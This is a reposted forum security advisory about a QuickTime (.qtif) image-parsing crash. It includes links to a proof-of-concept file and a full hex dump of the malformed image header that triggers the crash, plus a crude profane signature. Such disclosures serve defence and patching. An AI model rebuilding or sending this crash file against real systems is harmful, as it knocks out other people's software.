‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]Apple QuickTime <= 6.5.2.10 (.qtif) image Parsing Vulnerability

EvilOctal

团队执行官

Rank: 8Rank: 8

E.S.T社区执行帐号

帖子
9861 
精华
771 
积分
40900 
阅读权限
200 
性别
男 
在线时间
3984 小时 
注册时间
2004-7-4 
最后登录
2008-11-18 
楼主 发表于 2005-1-24 23:33  只看该作者

[转载]Apple QuickTime <= 6.5.2.10 (.qtif) image Parsing Vulnerability

信息来源:www.atmacasoft.com
文章作者:ATmaCA

Application: QuickTime
        http://www.apple.com/quicktime/

AFFECTED VERSION:
Versions verified to be vulnerable:
QuickTime.qts (6.5.2.10) and prior versions are affected.

The bug:
The problem specifically exists when QuickTime.qts component parsing
(.qtif) image files that contain uncompleted header.
A remote user can create a file that when processed by QuickTime PictureViewer or via browser,
will can cause the remote system to crash.

--Uncompleted qtif image file header
http://www.atmacasoft.com/exp/vuln.qtif.zip
http://www.milw0rm.com/sploits/vuln.qtif

00000000 0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000 ...^idsc...Vjpeg............
0000001C 6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D appl...........m.H...H....rM
00000038 0001 0C50 686F 746F 202D 204A 5045 4700 0000 0000 0000 0000 0000 0000 ...Photo - JPEG.............
00000054 0000 0000 0000 0018 FFFF 0000 7255 6964 6174 FFD8 FFE0 0010        ............rUidat......

VENDOR RESPONSE:
No vendor response.
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题